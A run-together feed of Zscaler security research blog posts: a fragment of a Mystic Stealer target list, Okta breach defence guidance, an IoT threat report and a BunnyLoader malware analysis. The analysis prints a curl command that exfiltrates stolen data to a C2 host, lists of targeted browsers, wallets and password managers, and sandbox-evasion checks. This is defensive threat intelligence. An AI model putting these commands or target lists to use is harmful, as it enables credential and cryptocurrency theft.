Dashlane|fdjamakpfbbddfjaooikfcpapjohcfmg
NordPass|fooolghllnmhmmndgjiamiiodkpenpbb
Roboform|pnlccmojcmeohlpggmfnbbiapkmbliob
LastPass|hdokiejnpimakedhajhdlcegeplioahd
BrowserPass|naepdomgkenhinolocfifgehpathddafch
MYKI|bmikpgodpkclnkgmnpphehdgcimmpathed
Targeted Cryptocurrency Wallets
Wallets/Jaxx Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb|*.*|0
Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0
Wallets/Binance|%appdata%\Binance|app-store.json,simple-storage.json,.finger-print.fp|0
Wallets/Coinomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0
Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info.seco|1
Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1
Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0
Wallets/Dogecoin|%appdata%\Bitcoin\wallets|*wallet*.dat|0
Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0
Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0
Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1
Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0
Wallets/Ethereum|%appdata%\Ethereum|keystore|0
Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0
Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0
Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0
Wallets/MultiDoge|%appdata%\MultiDoge|multidoge.wallet|0
Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0
Wed, 25 Oct 2023 08:30:01 -0700Javier Vicentehttps://www.zscaler.com/blogs/security-research/mystic-stealer-revisitedResponding and Defending Against IdP Vendor Compromise
https://www.zscaler.com/blogs/security-research/responding-and-defending-against-idp-vendor-compromise
Introduction
Based on Okta's statement on October 20 regarding a recent security breach, it has been determined that the threat actor successfully gained access to Okta's customer support system. Once inside the system, the threat actor was able to view files uploaded by Okta customers in relation to recent support cases with valid session tokens. By utilizing the extracted token from the Okta support system and support cases, the threat actor subsequently gained access to customer systems.
In this post, Zscaler ThreatLabz and the product security team describe the impact of identity provider (IdP) breaches and how your organization can better protect itself against these attacks by leveraging industry-wide best practices.
The Potential Impacts of Identity Provider Compromise
Identity threats targeting IdPs have quickly become the attack vector of choice for many threat actors. The recent compromise of a leading IdP provider isn't the first time adversaries gained access to critical customer information and it won't be the last.
When an IdP is compromised, the consequences can be severe. Unauthorized access to user accounts and sensitive information becomes a significant concern, leading to potential data breaches, financial loss, and unauthorized activity.
Identity attacks use social engineering, prompt-bombing, bribing employees for 2FA codes, and session hijacking (among many techniques) to get privileged access. The theft of user credentials, such as usernames and passwords or session tokens, can enable attackers to infiltrate other systems and services, and grant access to sensitive systems and resources. The exposure of personal or sensitive information can lead to identity theft, phishing attacks, and other forms of cybercrime. The recent breach serves as a stark reminder of the importance of robust security measures and continuous monitoring to safeguard identity provider systems and to protect against these potential impacts.
Traditional security controls are bypassed in such attacks as attackers assume a user's identity and their malicious activity is indistinguishable from routine behavior.
Unfortunately, every time a breach like this is reported, the security community is bombarded with pseudo-silver bullets claiming how the compromise could have been averted if only a particular solution had been deployed.
There are no silver bullets in cybersecurity. Adversaries can bypass even the best-laid defense plans.
This post explains several vendor-agnostic recommendations for how you can better prevent, detect, and/or contain a security incident targeting IdPs. By leveraging a combination of zero trust principles, deception & honeypots for detecting threats that bypass existing controls, and Identity Threat Detection & Response (ITDR) for maintaining strong identity hygiene, you can get visibility into active sessions and credential exposure on endpoints, while also being able to detect identity-specific attacks.
The Importance of Zero Trust Architecture in Defending Against IdP Compromise
Zero Trust Network Access (ZTNA) replaces network-level based access and reduces excessive implicit trust for access to resources, primarily from remote locations, by employees, contractors, and other third parties.
In this breach, the user unknowingly uploaded a file which had sensitive information to Okta's support management system. The adversary leveraged the session cookies from the uploaded information to further advance the breach. The DLP-like technology can be effective in preventing users uploading files with the sensitive data unknowingly.
Using posture control, organizations can limit access to applications on managed devices only. If the adversaries try to access the critical applications or servers from unmanaged devices, access will be prohibited. It is imperative to make unmanaged device access a mandatory part of the ZTNA architecture.
The attack blast radius can be reduced by enforcing stringent segmentation policies. An administrator should define the policies for combining user attributes and services to enforce who has access to what. It is important to determine if a universal access policy is needed for when users are on and off premises.
In this recent Okta breach, there are no reports that suggest major incidents so far. But in most cyberattacks, the threat actors are after the crown jewel systems and the data. Once the attackers have established a network foothold, they move laterally in the network, identifying the systems that are critical for the organizations to launch further attacks, including data theft. Defense-in-Depth (DiD) plays a very critical role in breaking the attack chain. The layered security approach enforces very strong defense against sophisticated attacks such that if one layer fails to detect an advancement of a threat actor in the attack chain, then the next layer can still detect the attacker’s next move and break the chain to neutralize the attack.
Leveraging Deception and ITDR Using the Zero Trust Platform for Defense
While zero trust reduces your attack surface by making resources invisible to the internet and minimizes the blast radius by connecting users directly to applications, deception and ITDR are two additional tools in your arsenal that can help prevent, detect, and contain identity-driven attacks.
Deception
Adversaries rely on human error, policy gaps, and poor security hygiene to circumvent defenses and stay hidden as they escalate privileges and move laterally. No security team can be 100% certain that their defenses are foolproof all the time–this is what adversaries take advantage of.
Deception changes the dynamics by injecting uncertainty into your environment. After hijacking a session token or using credentials, the attacker will scan the environment to find accounts and keys, and attempt to access critical applications and sensitive data.
A simple deception strategy can help detect adversary presence before an attacker can establish persistence or exfiltrate data.
Kill Chain
Attack Technique
Deception Defense
Initial Access
Uses stolen/purchased credentials to
access internet-facing applications like
IdPs, VPNs, RDP, and VDI.
Creates decoys of internet-facing
applications like IdPs, VPNs, and Citrix servers
that attackers are very likely to target.
Reconnaissance
Uses AD explorer to enumerate users, computers, and groups.
Creates decoy users, user groups, and computers in your Active Directory.
Privilege Escalation
Exploit vulnerabilities in collaboration platforms like Confluence, JIRA, and
GitLab to get credentials of a
privileged account.
Creates decoys of internal apps like Confluence, JIRA, and Gitlab that intercept the use of credentials to access
this system.
Privilege Escalation
Uses Mimikatz to extract credentials from memory in Windows. These credentials are then used to access higher privileged accounts.
Plants decoy credentials in Windows memory.
Lateral Movement
Moves laterally to core business applications and cloud environments to gain access to the victim organization's data.
Plants decoys of internal apps like code repositories, customer databases, business applications, and objects like S3 buckets and AWS keys in your cloud tenants.
Exfiltration
The adversary uses their access to download sensitive data and extort the victim.
Plants decoy files and other sensitive-seeming information on endpoints that detect any attempt to copy, modify,
delete, or exfiltrate the files.
Using deception will not always stop an identity attack but it will act as a last line of defense to detect a post-breach adversarial presence. This can help prevent a compromise from turning into a breach.
ITDR
ITDR is an emerging security discipline that sits at the intersection of threat detection and identity and access management.
It is becoming a top security priority for CISOs due to the rise of identity attacks and ITDR’s ability to provide visibility into an organization’s identity posture, implement hygiene best practices, and detect identity-specific attacks.
Augment your zero trust implementation with ITDR to prevent and detect identity attacks using following principles:
Identity Posture Management: Continuously assess identity stores like Active Directory, AzureAD, and Okta to get visibility into misconfigurations, excessive permissions, and Indicators or Exposure (IOEs) that could give attackers access to higher privileges and lateral movement paths.
Implement identity hygiene: Use posture management best practices to revoke permissions and configure default policies that minimize attack paths and privileges.
Threat Detection: Monitor endpoints for specific activities like DCSync, DCShadow, Kerberoasting, LDAP enumeration, and similar changes that correlate to malicious behavior.
Detecting and Responding to IdP Breaches
An effective Security Operations Center (SOC) playbook plays a crucial role in proactively identifying and mitigating potential IdP attack vectors. By implementing a comprehensive monitoring and detection strategy, organizations can swiftly respond to IdP attack attempts, safeguard user identities, and protect critical resources.
Our SOC playbook for the IdP and MFA threat vectors contains detection alerts which are essential to identifying and responding to potential security incidents.
Monitor and alert for:
Monitor permission changes implemented by suspicious users
Admin with an unusual location
Admin with an unusual user agent
Admin with an unusual agent version
Monitor for failed Okta authentications for privileged users without a follow-up successful authentication
Monitor for failed Okta authentications for different users coming from the same source
Monitor for reused session IDs
Same session ID with different user agents
Same session ID coming from different countries
Monitor for MFA resets
For Okta customers, it is advisable to contact the company directly to obtain more information regarding the potential impact to their organization. Additionally, we offer the following recommendations as immediate action:
Perform thorough investigation for any of the following recent events in your environment:
Recent password resets or MFA resets performed by helpdesk or support personnel
Review all recently created Okta administrators
Review that all password resets are valid
Review all MFA related events, such as MFA resets or changes to any MFA configuration
Ensure MFA is enabled for all user accounts and administrator accounts, and review actions performed by the administrator accounts
Identity and MFA Best Practices
Employing security best practices in managing your identities and MFA configuration is paramount in establishing a robust security posture and effectively mitigating the risks associated with unauthorized access and data breaches. By diligently implementing the following measures and best practices, organizations can greatly fortify the safeguarding of identities and bolster the efficacy of their MFA deployment.
Protect User Identities
Use Strong and Unique Passwords: Encourage users to create strong, complex, and unique passwords for their accounts. Implement password policies that enforce minimum length, complexity, and regular password changes
Implement Least Privilege: Follow the principle of least privilege, granting users only the minimum access necessary to perform their tasks. By limiting user privileges, you reduce the potential impact of compromised credentials.
Educate Users: User awareness and education play a vital role in maintaining security. Train users on the importance of strong passwords, how to recognize phishing attempts, and how to properly use MFA methods. Regularly remind users to follow security best practices and report any suspicious activities.
Protect against MFA attacks
Traditional MFA methods, such as SMS codes or email-based one-time passwords (OTPs), can be susceptible to phishing attacks. Phishers can intercept these codes or trick users into entering them into fake login pages, thereby bypassing the additional layer of security provided by MFA. To address this vulnerability, phish-resistant MFA methods have been developed. These methods aim to ensure that even if users are tricked into entering their credentials on a phishing website, the attacker cannot gain access without the additional authentication factor.
Use FIDO2-Based MFA: FIDO2 (Fast Identity Online) is a strong authentication standard that provides secure and passwordless authentication. It is recommended to implement FIDO2-based MFA, which uses public key cryptography to enhance security and protect against phishing attacks.
Utilize Hardware Tokens: Hardware tokens, such as USB security keys or smart cards, can provide an extra level of security for MFA. These physical devices generate one-time passwords or use public key cryptography for authentication, making it difficult for attackers to compromise.
Zscaler’s ThreatLabZ and product security teams will continue to monitor the Okta breach. If any further information is disclosed by Okta or discovered through other sources, we will publish an update to this post.
Wed, 25 Oct 2023 17:40:50 -0700Deepen Desaihttps://www.zscaler.com/blogs/security-research/responding-and-defending-against-idp-vendor-compromise2023 ThreatLabz Report Indicates 400% Growth in IoT Malware Attacks
https://www.zscaler.com/blogs/security-research/2023-threatlabz-report-indicates-400-growth-iot-malware-attacks
Introduction
This blog serves as a brief synopsis of the key points revealed in the Zscaler ThreatLabz 2023 Enterprise IoT and OT Threat Report.
Our report explores the growth of Internet of Things (IoT) device traffic and IoT malware attacks, in addition to how legacy vulnerabilities, targeted devices, and specific industries have become central players in the IoT and operational technology (OT) security narrative. In addition, the report outlines IoT security best practices and practical guidance for preventing IoT malware attacks.
The report also offers strategies to ensure the resilience of OT environments, spotlighting the convergence of IoT and OT driven by digital transformation in critical sectors such as manufacturing and utilities.
Growth in connected device traffic and IoT malware attacks
ThreatLabz research clearly indicates that IoT adoption remains on an upward trajectory, evidenced by an 18% increase in IoT device traffic compared to previous assessments in 2021. However, this expanding IoT ecosystem is not without its challenges. The ThreatLabz team analyzed approximately 300,000 blocked attacks on IoT devices and found a concerning surge in IoT malware attacks — 400% to be exact. Botnet activity continues to dominate the malware attack space, with the Mirai and Gafgyt malware families accounting for 66% of attack payloads.
Figure 1: Top IoT malware families observed in the Zscaler cloud, January–June 2023
Manufacturing leads in unique IoT traffic and malware attacks
The manufacturing sector’s substantial lead in unique IoT devices, nearly tripling the count of other sectors. This surge in adoption underscores the industry’s dedication to embracing advanced automation and digitization, positioning it as a frontrunner in leveraging IoT for enhanced production efficiency, product quality, and innovation in the era known as Industry 4.0 or the Fourth Industrial Revolution. Industry 4.0 is characterized by the integration of digital technologies and industrial processes. IoT devices are the linchpin of Industry 4.0, providing real-time data and connectivity across the production chain. The convergence of IoT devices and data into existing OT systems is transforming industrial operations.
The explosive growth of technological innovation and IoT devices in manufacturing has made this sector a prime target for malware attacks.
On an average week, the manufacturing sector receives more than triple the number of attacks as any other sector. Manufacturing customers take the brunt of malware attacks at 54.5%. With a low tolerance for operational disruptions, manufacturing is high stakes for malware attacks. Attacks on manufacturing customers can have ripple effects that impact other sectors like:
supply chain and logistics
defense and national security
finance
retail
technology
construction and real estate
Figure 2: Breakdown of verticals targeted by IoT malware attacks
High attack volumes not only jeopardize IoT systems but also pose a serious threat to OT processes. Attacks on OT infrastructure can lead to severe disruptions in crucial industrial operations and, in some cases, even jeopardize human lives.
United States attracts the most malware authors
The United States boasts a robust and interconnected digital infrastructure that acts as a magnet for malware authors worldwide. Its extensive network and advanced technology ecosystem offer unparalleled opportunities for efficiently distributing malware, wreaking havoc with widespread impact, and ultimately compromising a wide range of systems to exploit vulnerabilities and propagate malicious software.
Figure 3: Top IoT malware targeted countries
IoT/OT Security Best Practices
Here is a preview of the IoT/OT best practices compiled by our team of cybersecurity experts. For the entire list of best practices, please download a free copy of the ThreatLabz 2023 IoT and OT Threat Report.
Maintain comprehensive visibility into IoT devices.
Securing IoT devices begins with knowing what devices are connected to your network and what those devices are doing. Gain visibility into all IoT devices, including unmanaged devices, by utilizing solutions that analyze network logs to monitor communications and activity. Continuous visibility and awareness of what is connected to the network at all times is critical, no matter where devices are located.
Protect admin credentials and enable MFA.
Multi-factor authentication (MFA) requires users to enter a secondary mode of verification in addition to their password. This extra layer of security can thwart attackers from gaining access to user accounts if they have obtained credentials, preventing lateral threat movement from compromised user devices.
Train employees on IoT device security.
Educate employees about the risks of connecting unauthorized devices to the network. Encourage them to report any new devices they connect and conduct security awareness training to help employees identify and avoid attacks on user devices.
Implement a zero trust security architecture.
For both IoT and OT, eliminate implicit trust. Enforce segmentation with least-privileged access to ensure users and devices can access only what they need. Any unsanctioned shadow IoT devices that need internet access should go through traffic inspection and, ideally, be blocked from corporate data via a proxy.
Zero trust is also key to preventing unplanned downtime and ensuring maximum productivity in industrial systems. Zero trust can minimize your attack surface, eliminate lateral movement, and accelerate OT/IoT convergence.
Conclusion
The convergence of IoT and OT represents a pivotal time in the evolution of technology and industry, propelled by the ever-increasing adoption of IoT, connectivity, and innovation. However, as we have seen, it also opens new avenues for cyber threats that can disrupt critical operations, as discussed in the Zscaler ThreatLabz 2023 Enterprise IoT and OT Threat Report.
As we move forward, it’s vital to remain vigilant and proactive in implementing security measures to ensure a safe and secure interconnected digital world. Zscaler ThreatLabz publishes this report year after year to help organizations recognize the importance of robust security measures and safeguarding our interconnected future.
Tue, 24 Oct 2023 09:05:29 -0700Viral Gandhihttps://www.zscaler.com/blogs/security-research/2023-threatlabz-report-indicates-400-growth-iot-malware-attacksBunnyLoader, the newest Malware-as-a-Service
https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service
Introduction
In early September, Zscaler ThreatLabz discovered a new Malware-as-a-Service (MaaS) threat called “BunnyLoader” being sold on various forums. BunnyLoader provides various functionalities such as downloading and executing a second-stage payload, stealing browser credentials and system information, and much more. BunnyLoader employs a keylogger to log keystrokes as and a clipper to monitor the victim’s clipboard and replace cryptocurrency wallet addresses with actor-controlled cryptocurrency wallet addresses. Once the information is obtained, BunnyLoader encapsulates the data into a ZIP archive and proceeds to transmit the pilfered data to a command-and-control (C2) server. In this blog, we’ll describe how BunnyLoader works and its technical components.
Key Takeaways
ThreatLabz identified a new malware loader written in C/C++ named “BunnyLoader” sold on various forums for $250.
BunnyLoader is under rapid development with multiple feature updates and bug fixes.
BunnyLoader employs various anti-sandbox techniques during its attack sequence.
BunnyLoader downloads and executes a second-stage payload, logs keys, steals sensitive information and cryptocurrency, and executes remote commands.
Basics
In early September, ThreatLabz came across a new malware loader named BunnyLoader. The malware was being sold on various forums by a user named “PLAYER_BUNNY”/”PLAYER_BL”, who seems to be one of the developers of the loader as shown in the figure below.
Figure 1: BunnyLoader advertisement from criminal forums.
Based on the advertisement, BunnyLoader has the following features:
Written in C/C++
Fileless loader - download & execute further malware stages in memory
Consists of stealer and clipper capabilities
Remote command execution
Incorporates anti-analysis techniques
Provides a web panel showcasing stealer logs, total clients, active tasks and much more
Price - $250 (Lifetime)
Since BunnyLoader’s v1.0 initial release on September 4, 2023, the malware has been under rapid development, with many feature updates and bug fixes being released between the 4th of September and the time this blog was written (September 29 2023). In the table below, you can see that BunnyLoader’s updates address bug issues, changes to the C2 panel, and even new pricing tiers.
BunnyLoader release history
Version
Date of Release
Updates
BunnyLoader v1.0
Sept 4, 2023
N/A
BunnyLoader v1.1
Sept 5, 2023
Client bug
Compress stealer logs before uploading
Command added for reverse shell: pwd
BunnyLoader v1.2
Sept 6, 2023
Added browser history recovery to stealer
Added NGRok auth-token recovery to stealer
Added Chromium browser paths (Chromium, Google Chrome x86, MapleStudio, Iridium, Maxthon3)
BunnyLoader v1.3
Sept 9, 2023
Added credit card recovery to stealer function
Added support for 16 different credit card types
Fix C2 bugs
BunnyLoader v1.4
Sept 10, 2023
Implemented AV evasion
BunnyLoader v1.5
Sept 11, 2023
Added VPN recovery to stealer (ProtonVPN & OpenVPN)
Fix fileless loader bugs
Optimization in loading logs
BunnyLoader v1.6
Sept 12, 2023
Added downloads history viewer to stealer
Added anti-sandbox techniques
BunnyLoader v1.7
Sept 15, 2023
Implemented additional AV evasion
BunnyLoader v1.8
Sept 15, 2023
Implemented keylogger functionality
Bug fixes in execution of tasks
Fix C2 bugs
BunnyLoader v1.9
Sept 17, 2023
Added game recovery to stealer (Uplay & Minecraft)
Added 5 Chromium browser paths
Added 1 desktop wallet recovery to stealer
BunnyLoader v2.0
Sept 27, 2023
C2 GUI Changes
Fix critical vulnerabilities - SQL injection in the C2 Panel which would give access to the database and XSS vulnerabilities fixed
Major bugs fixed
C2 will detect and block exploit attempts
Optimization in stealer
Optimization in fileless loader
Selling private stub:
Advanced and proactive anti-analysis
Inject payload into memory (support x86/x64)
AV evasion
Persistence
New prices:
Payload - $250
Payload + Stub - $350
C2 Panel
The BunnyLoader C2 panel showcases a list of various tasks including:
downloading and executing additional malware
keylogging
stealing credentials
manipulating a victim’s clipboard to steal cryptocurrency
running remote commands on the infected machine
The parameters consisting of the download URL and the cryptocurrency wallet addresses are added in the panel as shown below.
Figure 2: A screenshot of the BunnyLoader C2 panel configuration.
The BunnyLoader panel also provides:
statistics for infections
the total connected/disconnected clients
active tasks
stealer logs and also
The information can be cleared from the panel.
Figure 3: A screenshot of the statistics and options to clear data in the BunnyLoader C2 panel.
In addition, the infected machines can be controlled remotely through the C2 panel, as shown in the screenshot below.
Figure 4: A screenshot of the BunnyLoader C2 panel showing infected systems.
Technical Analysis
In the following section, we will analyze a malware sample of BunnyLoader. Upon execution of BunnyLoader, the loader performs the following actions:
Creates a new registry value named “Spyware_Blocker” in the Run registry key (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run) where the value is the path to the BunnyLoader binary. This registry value allows BunnyLoader to maintain persistence on the machine.
Hides the window using ShowWindow() with nCmdShow as SW_HIDE
Creates a mutex name “BunnyLoader_MUTEXCONTROL” via CreateMutexW()
Performs the following anti-VM techniques:
Checks for the following modules:
SxIn.dll - 360 Total Security
cmdvrt32.dll / cmdvrt64.dll - Comodo Antivirus
wine_get_unix_file_name - Detects Wine
SbieDll.dll - Sandboxie
Checks for a VM using “ROOT\CIMV2” queries:
SELECT * FROM Win32_VideoController
Win32_Processor
Win32_NetworkAdapter
Win32_BIOS
SELECT * FROM Win32_ComputerSystem
Checks for a Docker container via “/proc/1/cgroup” - if the container exists, BunnyLoader does not perform further malicious actions.
Checks for the following blacklisted sandbox usernames:
ANYRUN
Sandbox
Test
John Doe
Abby
Timmy
Maltest
malware
Emily
Timmy
Paul Jones
CurrentUser
IT-ADMIN
Walker
Lisa
WDAGUtilityAccount
Virus
fred
If a sandbox is identified, BunnyLoader throws the following error message:
“The version of this file is not compatible with the current version of Windows you are running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.”
Otherwise, BunnyLoader performs an HTTP registration request to a C2 server as shown below:
GET /Bunny/Add.php?country=<country>&ip=<ip>&host=<host>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: BunnyLoader
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 11
Content-Type: text/html; charset=UTF-8
Connected
The registration request sent to the C2 server (shown above) contains the following information:
Information in C2 server request
Value
Description
country
Gathers the country where the infected system is connecting from via “http[:]//ip-api.com/csv” where the user agent is “BunnyRequester”
ip
Gathers the victim IP from “http[:]//api.ipify.org” where the user agent is “BunnyRequester”
host
Gathers the hostname via GetComputerNameA
ver
The version of BunnyLoader (e.g., 2.0)
system
Fetches the operating system via “systeminfo | findstr /B /C:"OS Name”
privs
Fetches the privileges of the current user via OpenProcessToken. Sends “Admin” if the user is an administrator or sends the string “user”.
av
Gathers the anti-virus on the infected machine via wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value
The user agent for the request is set to “BunnyLoader”. If the response from the C2 is “Connected”, BunnyLoader performs the core malicious actions.
Task Execution
After registration, BunnyLoader sends a task request to the C2 server “http[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID=<bot_id>” with the user agent as “BunnyTasks”. As shown below, the response to the task request consists of the “ID”, “Name” and “Params”.
GET /Bunny/TaskHandler.php?BotID=<Bot_ID> HTTP/1.1
User-Agent: BunnyTasks
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 102
Content-Type: text/html; charset=UTF-8
ID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc1<bitcoin_address>5k
Here the "Name" is the module (functionality) to be executed and the “params” are the parameters passed to the module. Based on the module name received in the task response, BunnyLoader further performs its actions.
BunnyLoader consists of the following tasks:
Trojan Downloader
Download and Execute (Fileless Execution)
Download and Execute (Disk Execution)
Intruder
Run Keylogger
Run Stealer
Clipper
Bitcoin
Monero
Ethereum
Litecoin
Dogecoin
ZCash
Tether
Remote Command Execution
Run Keylogger Task
BunnyLoader implements a basic keylogger using GetAsyncKeyState() for logging key strokes. The output of the keylogger is stored in the file “C:\Users\<username>\AppData\Local\Keystrokes.txt”.
Run Stealer Task
BunnyStealer is designed to steal information related to web browsers, cryptocurrency wallets, VPNs and much more. Eventually the stolen information is stored in a folder named “BunnyLogs” in the Appdata\Local Directory, which is compressed as a ZIP archive, and exfiltrated to the C2 server. The following are the web browsers targeted by BunnyLoader:
7Star\7Star\User Data
Yandex\YandexBrowser\User Data
CentBrowser\User Data
Comodo\User Data
Chedot\User Data
360Browser\Browser\User Data
Vivaldi\User Data
Maxthon3\User Data
Kometa\User Data
K-Melon\User Data
Elements Browser\User Data
Google\Chrome\User Data\\Sputnik\Sputnik\User Data
Epic Privacy Browser\User Data
Nichrome\User Data
uCozMedia\Uran\User Data
CocCoc\Browser\User Data
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Uran\User Data
CatalinaGroup\Citrio\User Data
Chromodo\User Data
Coowon\Coowon\User Data
Mail.Ru\Atom\User Data
liebao\User Data
Microsoft\Edge\User Data
QIP Surf\User Data
BraveSoftware\Brave-Browser\User Data
Orbitum\User Data
Chromium\User Data
Comodo\Dragon\User Data
Google(x86)\Chrome\User Data
Amigo\User\User Data
MapleStudio\ChromePlus\User Data
Torch\User Data
Iridium\User Data
BunnyLoader steals following information from these web browsers:
AutoFill data
Credit cards
Downloads
History
Passwords
The malware targets the following cryptocurrency wallets:
Armory
Exodus
AutomaticWallet
Bytecoin
Ethereum
Coinomi
Jaxx
Electrum
Guarda
BunnyLoader steals credentials from the following VPN clients:
ProtonVPN
OpenVPN
Credentials are also stolen from following messaging applications:
Skype
Tox
Signal
Element
ICQ
Examples of the stolen information are shown in the figure below. The logs consist of an information.txt file which contains system information along with the information related to the location of the infected machine. Each folder contains the corresponding data stolen from the system. For example, the Browser folder contains the web browser history and downloaded file information.
Figure 5: A screenshot of the information exfiltrated by BunnyLoader.
The stolen data is archived using the Powershell cmdlet: System.IO.Compression.ZipFile with the filename “BunnyLogs_<hostname>.zip”. The ZIP archive is exfiltrated to the C2 server via the following CURL command:
cmd.exe /c curl -F
"file=@C:\Users\user\AppData\Local\BunnyLogs_468325.zip"
http[:]//37[.]139[.]129[.]145/Bunny/Uploader.php
BunnyLoader also performs a stealer registration request containing statistics related to the stolen information and the link to the exfiltrated logs with the user agent: “BunnyStealer”, as shown below:
GET /Bunny/StealerRegistration.php?country=<country>&ip=<ip>&system=Micro
soft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0&lin
k=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_
468325.zip&date=Mon+Sep+25+21%3A47%3A41+2023%0A&games=0 HTTP/1.1
User-Agent: BunnyStealer
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
Clipper Task
The BunnyLoader clipper module checks a victim's clipboard for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor.
In this case, the targeted cryptocurrencies are:
Bitcoin
Monero
Ethereum
Litecoin
Dogecoin
ZCash
Tether
The clipper receives the cryptocurrency wallet addresses to replace from the C2 server.
Download and Execute Task
BunnyLoader performs two types of download and execute functions.
The first type is downloading a file from a URL provided by the C2, which is written to disk in the AppData\Local directory and further executed.
The second type uses fileless execution, where BunnyLoader creates a “notepad.exe” process in a suspended state and then downloads the payload from the received URL with the user agent “BunnyLoader_Dropper”. The downloaded binary is stored in a memory buffer and BunnyLoader performs Process Hollowing to inject the downloaded payload into the “notepad.exe” process as shown in the figure below.
Figure 6: A screenshot of BunnyLoader fileless download and executing code.
After the tasks are completed, BunnyLoader sends the following task completion request with the user agent as “TaskCompleted” and the CommandID as the Task ID. An example task completion request is shown below:
http://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5&BotID=272148461
Remote Command Execution Task
BunnyLoader performs remote command execution from the C2 panel. BunnyLoader receives the commands to be executed on the infected machine via an “echoer” request to C2 server (e.g., http[:]//37[.]139[.]129[.]145/Bunny/Echoer.php) with the user agent set to “BunnyTasks” as shown in the figure below. BunnyLoader parses the response and checks for the following commands: “help”, “cd”, “pwd” and then executes the command using _popen and the command output is been sent across to the C2 server as the “&value=” parameter in a result command request: (e.g., http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php) with the user agent: “BunnyShell”.
Figure 7: A screenshot of BunnyLoader remote command execution.
BunnyLoader also performs a heartbeat request in order to inform the C2 that the infected system is online as shown below. The user agent for the heartbeat is “HeartBeat_Sender”.
GET /Bunny/Heartbeat.php?country=<country>&ip=<ip>&host=<hostname>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: HeartBeat_Sender
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 13
Content-Type: text/html; charset=UTF-8
Client online
ConclusionBunnyLoader is a new MaaS threat that is continuously evolving their tactics and adding new features to carry out successful campaigns against their targets. The Zscaler ThreatLabz team will continue to monitor these attacks to help keep our customers safe.Win32.Downloader.BunnyLoaderIndicators of Compromise (IOCs)
C2 Server - 37[.]139[.]129[.]145/Bunny/
BunnyLoader samples:
dbf727e1effc3631ae634d95a0d88bf3
bbf53c2f20ac95a3bc18ea7575f2344b
59ac3eacd67228850d5478fd3f18df78
Fri, 29 Sep 2023 19:09:13 -0700Niraj Shivtarkarhttps://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-serviceAnalysis of Generative AI Trends and ChatGPT Usage
https://www.zscaler.com/blogs/security-research/analysis-generative-ai-trends-and-chatgpt-usage
Introduction
The release of ChatGPT underscores the potential of artificial intelligence to revolutionize the daily operations of organizations. This paradigm shift is compelling businesses to reevaluate their conventional approaches and embrace the transformative capabilities offered by AI. Among the noteworthy facets of AI’s evolution, Large Language Models (LLMs) have emerged as a dominant force, reshaping user interactions and communication. The driving force behind this transformation is the pursuit of vast datasets, enabling machine learning algorithms to analyze patterns and generate responses in a seamlessly natural language.
In this blog, we aim to provide a comprehensive perspective on the impact of AI-powered applications and offer guidelines for the responsible integration of AI tools within organizational contexts.
Key Takeaways
- OpenAI.com stands out as the preeminent domain for AI and ML enthusiasts, offering a wealth of resources, research, and interactive AI models. Notably, over half of the website’s traffic is attributed to ChatGPT, underlining its significant impact on user engagement and AI exploration.
- Drift has secured its position as the most popular AI/ML application, specifically excelling in language processing through LLM-based SaaS solutions. Drift’s popularity rivals ChatGPT, which came in just under Drift by less than 1%.
- ChatGPT experienced a substantial surge in usage during the initial months of this year, indicative of its growing relevance and adoption. However, the upward trajectory reached a plateau in August.
- The lion’s share of AI/ML traffic is predominantly generated from the United States and India. The primary use case for this global traffic surge is the exploration and implementation of generative AI applications.
AI vs LLMs
AI and LLMs are two interconnected but distinct concepts in the field of computer science. AI represents the broader umbrella term, encompassing a wide array of techniques and technologies designed to simulate human intelligence and problem-solving. It includes machine learning, generative artificial intelligence models, natural language processing, computer vision, robotics, and deep learning, among others. LLMs are a specific subset of AI, focused primarily on natural language understanding and processing.1
